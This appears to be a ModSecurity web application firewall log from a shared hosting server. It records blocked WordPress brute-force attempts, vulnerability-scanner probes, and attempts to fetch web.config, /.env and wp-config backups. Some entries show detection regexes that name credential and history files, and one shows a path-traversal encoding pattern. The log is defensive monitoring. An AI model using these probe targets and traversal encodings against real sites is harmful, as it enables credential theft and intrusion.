[Tue May 26 13:46:33.464694 2026] [security2:error] [pid 544395:tid 544556] [client 62.60.130.230:54039] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Rmrs7g3RMCdp8XnaAAAAB8"]
[Tue May 26 13:46:33.822180 2026] [security2:error] [pid 544395:tid 544537] [client 62.60.130.230:57125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Rmrs7g3RMCdp8XnagAAAAw"]
[Tue May 26 13:46:33.875444 2026] [security2:error] [pid 544395:tid 544611] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW4Rmrs7g3RMCdp8XnZwAAAFY"]
[Tue May 26 13:46:33.875573 2026] [security2:error] [pid 544395:tid 544605] [client 129.222.147.134:34552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW4Rmrs7g3RMCdp8XnbgAAAFA"]
[Tue May 26 13:46:33.879272 2026] [security2:error] [pid 544395:tid 544605] [client 129.222.147.134:34552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW4Rmrs7g3RMCdp8XnbgAAAFA"]
[Tue May 26 13:46:34.174286 2026] [security2:error] [pid 544395:tid 544609] [client 62.60.130.230:61825] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4hmrs7g3RMCdp8XnewAAAFQ"]
[Tue May 26 13:46:34.264340 2026] [security2:error] [pid 544395:tid 544525] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW4Bmrs7g3RMCdp8XnVQAAAAA"]
[Tue May 26 13:46:34.422180 2026] [security2:error] [pid 544395:tid 544425] [remote 45.250.255.226:38554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVW4hmrs7g3RMCdp8XnfAAAGR0"]
[Tue May 26 13:46:34.540317 2026] [security2:error] [pid 536875:tid 537046] [client 45.148.10.159:55882] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.soto-plumbing.com"] [uri "/"] [unique_id "ahVW4Or_-FTveSGlx1EBbAAAAPY"]
[Tue May 26 13:46:34.595948 2026] [security2:error] [pid 544395:tid 544624] [client 103.4.251.187:56624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW4hmrs7g3RMCdp8XniQAAAGM"]
[Tue May 26 13:46:34.935354 2026] [security2:error] [pid 544395:tid 544540] [client 4.201.75.230:56256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deepakrohilla.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVW4hmrs7g3RMCdp8Xn7gAAAA8"]
[Tue May 26 13:46:35.096904 2026] [fcgid:warn] [pid 544395:tid 544540] (70014)End of file found: [client 103.4.251.187:56664] mod_fcgid: can't get data from http client
[Tue May 26 13:46:35.459073 2026] [security2:error] [pid 544395:tid 544642] [client 103.4.251.187:56796] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW4xmrs7g3RMCdp8XoHAAAAHU"]
[Tue May 26 13:46:35.475747 2026] [security2:error] [pid 544395:tid 544650] [client 103.4.251.187:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW4xmrs7g3RMCdp8XoIwAAAH0"]
[Tue May 26 13:46:35.792163 2026] [security2:error] [pid 544395:tid 544473] [remote 45.250.255.226:59096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVW4xmrs7g3RMCdp8XoTQAAfk0"]
[Tue May 26 13:46:35.951481 2026] [http2:info] [pid 555743:tid 555743] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:46:36.066671 2026] [security2:error] [pid 544395:tid 544551] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW4xmrs7g3RMCdp8XoOQAAABo"]
[Tue May 26 13:46:36.216710 2026] [security2:error] [pid 544395:tid 544525] [client 103.4.251.187:56530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW5Bmrs7g3RMCdp8XoigAAAAA"]
[Tue May 26 13:46:36.305908 2026] [security2:error] [pid 544395:tid 544639] [client 4.201.75.230:5594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/rip.php"] [unique_id "ahVW5Bmrs7g3RMCdp8XokAAAAHI"]
[Tue May 26 13:46:37.676909 2026] [security2:error] [pid 555743:tid 555901] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW5cjqAquC0YaxQjCdzgAAASY"]
[Tue May 26 13:46:37.973675 2026] [security2:error] [pid 544395:tid 544621] [client 85.208.96.202:20832] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVW5Rmrs7g3RMCdp8XozAAAAGA"]
[Tue May 26 13:46:37.973809 2026] [security2:error] [pid 544395:tid 544621] [client 85.208.96.202:20832] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVW5Rmrs7g3RMCdp8XozAAAAGA"]
[Tue May 26 13:46:38.836317 2026] [security2:error] [pid 555743:tid 555939] [client 23.158.233.122:60086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVW5sjqAquC0YaxQjCd8AAAAUw"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 13:46:38.836474 2026] [security2:error] [pid 555743:tid 555939] [client 23.158.233.122:60086] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVW5sjqAquC0YaxQjCd8AAAAUw"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 13:46:39.217912 2026] [security2:error] [pid 544395:tid 544589] [client 104.252.191.170:50122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW5xmrs7g3RMCdp8XpMQAAAEA"]
[Tue May 26 13:46:39.321328 2026] [security2:error] [pid 555743:tid 555994] [client 23.158.233.122:60124] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVW58jqAquC0YaxQjCeEwAAAYM"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 13:46:39.380038 2026] [security2:error] [pid 555743:tid 555883] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW58jqAquC0YaxQjCeDgAAARQ"]
[Tue May 26 13:46:39.468960 2026] [security2:error] [pid 555743:tid 555997] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW58jqAquC0YaxQjCd-QAAAYY"]
[Tue May 26 13:46:39.557829 2026] [security2:error] [pid 544395:tid 544588] [client 103.4.251.187:56728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW5xmrs7g3RMCdp8XpWwAAAD8"]
[Tue May 26 13:46:39.638816 2026] [security2:error] [pid 544395:tid 544526] [client 106.192.248.115:58638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW5xmrs7g3RMCdp8XpVAAAAAE"]
[Tue May 26 13:46:39.638948 2026] [security2:error] [pid 544395:tid 544526] [client 106.192.248.115:58638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW5xmrs7g3RMCdp8XpVAAAAAE"]
[Tue May 26 13:46:39.706012 2026] [security2:error] [pid 555743:tid 555931] [client 104.252.191.170:49896] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW58jqAquC0YaxQjCeOAAAAUQ"]
[Tue May 26 13:46:39.706473 2026] [security2:error] [pid 544395:tid 544540] [client 45.148.10.159:55892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.soto-plumbing.com"] [uri "/"] [unique_id "ahVW5xmrs7g3RMCdp8XpCQAAAFw"]
[Tue May 26 13:46:39.832151 2026] [security2:error] [pid 555743:tid 555956] [client 104.252.191.170:49912] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW58jqAquC0YaxQjCePQAAAV0"]
[Tue May 26 13:46:39.844864 2026] [security2:error] [pid 555743:tid 555962] [client 104.252.191.170:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW58jqAquC0YaxQjCePwAAAWM"]
[Tue May 26 13:46:40.173099 2026] [security2:error] [pid 544395:tid 544548] [client 4.201.75.230:5616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/admin.php"] [unique_id "ahVW6Bmrs7g3RMCdp8XprwAAABc"]
[Tue May 26 13:46:40.882807 2026] [security2:error] [pid 544395:tid 544541] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW6Bmrs7g3RMCdp8Xp0wAAABA"]
[Tue May 26 13:46:41.030775 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW6MjqAquC0YaxQjCexQAAAR8"]
[Tue May 26 13:46:42.637246 2026] [security2:error] [pid 544395:tid 544546] [client 103.4.251.187:56856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahVW6hmrs7g3RMCdp8XqdgAAABU"]
[Tue May 26 13:46:42.668175 2026] [security2:error] [pid 555743:tid 555994] [client 103.4.251.187:6338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVW6sjqAquC0YaxQjCfDgAAAYM"]
[Tue May 26 13:46:42.720033 2026] [security2:error] [pid 544395:tid 544545] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW6hmrs7g3RMCdp8XqcQAAABQ"]
[Tue May 26 13:46:43.153302 2026] [security2:error] [pid 555743:tid 555919] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW6sjqAquC0YaxQjCfBQAAATg"]
[Tue May 26 13:46:43.455548 2026] [security2:error] [pid 555743:tid 555970] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW68jqAquC0YaxQjCfWQAAAWs"]
[Tue May 26 13:46:44.196186 2026] [security2:error] [pid 555743:tid 555923] [client 129.222.147.134:22103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW7MjqAquC0YaxQjCfbgAAATw"]
[Tue May 26 13:46:44.206115 2026] [security2:error] [pid 555743:tid 555923] [client 129.222.147.134:22103] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW7MjqAquC0YaxQjCfbgAAATw"]
[Tue May 26 13:46:44.389447 2026] [security2:error] [pid 544395:tid 544602] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW6xmrs7g3RMCdp8XqvAAAAE0"]
[Tue May 26 13:46:45.320743 2026] [security2:error] [pid 544395:tid 544573] [client 4.201.75.230:5670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVW7Rmrs7g3RMCdp8Xq5QAAADA"]
[Tue May 26 13:46:46.412758 2026] [security2:error] [pid 555743:tid 555829] [remote 74.7.241.58:51484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVW7sjqAquC0YaxQjCfuwABOFU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 13:46:46.571318 2026] [security2:error] [pid 544395:tid 544533] [client 4.201.75.230:56264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deepakrohilla.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVW7hmrs7g3RMCdp8XrHAAAAAg"]
[Tue May 26 13:46:47.193447 2026] [security2:error] [pid 544395:tid 544605] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW7hmrs7g3RMCdp8XrIgAAAFA"]
[Tue May 26 13:46:47.800710 2026] [security2:error] [pid 544395:tid 544564] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW7xmrs7g3RMCdp8XrLwAAACc"]
[Tue May 26 13:46:47.889799 2026] [security2:error] [pid 544395:tid 544549] [client 104.252.191.170:41794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVW7xmrs7g3RMCdp8XrSQAAABg"]
[Tue May 26 13:46:48.018911 2026] [security2:error] [pid 555743:tid 555981] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW78jqAquC0YaxQjCf0QAAAXY"]
[Tue May 26 13:46:48.054852 2026] [security2:error] [pid 555743:tid 555943] [client 47.31.155.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW78jqAquC0YaxQjCf0wAAAVA"]
[Tue May 26 13:46:48.552132 2026] [security2:error] [pid 555743:tid 555831] [remote 194.59.31.115:57331] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahVW8MjqAquC0YaxQjCgHgABPlc"]
[Tue May 26 13:46:48.705732 2026] [security2:error] [pid 555743:tid 555747] [remote 194.59.31.115:57331] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:file_name. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:file_name"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/pms"] [unique_id "ahVW8MjqAquC0YaxQjCgJQABTgM"]
[Tue May 26 13:46:48.773543 2026] [security2:error] [pid 544395:tid 544647] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVW8Bmrs7g3RMCdp8XrWwAAAHo"]
[Tue May 26 13:46:48.777510 2026] [security2:error] [pid 544395:tid 544595] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVW8Bmrs7g3RMCdp8XrXQAAAEY"]
[Tue May 26 13:46:48.779896 2026] [security2:error] [pid 544395:tid 544543] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVW8Bmrs7g3RMCdp8XrXAAAABI"]
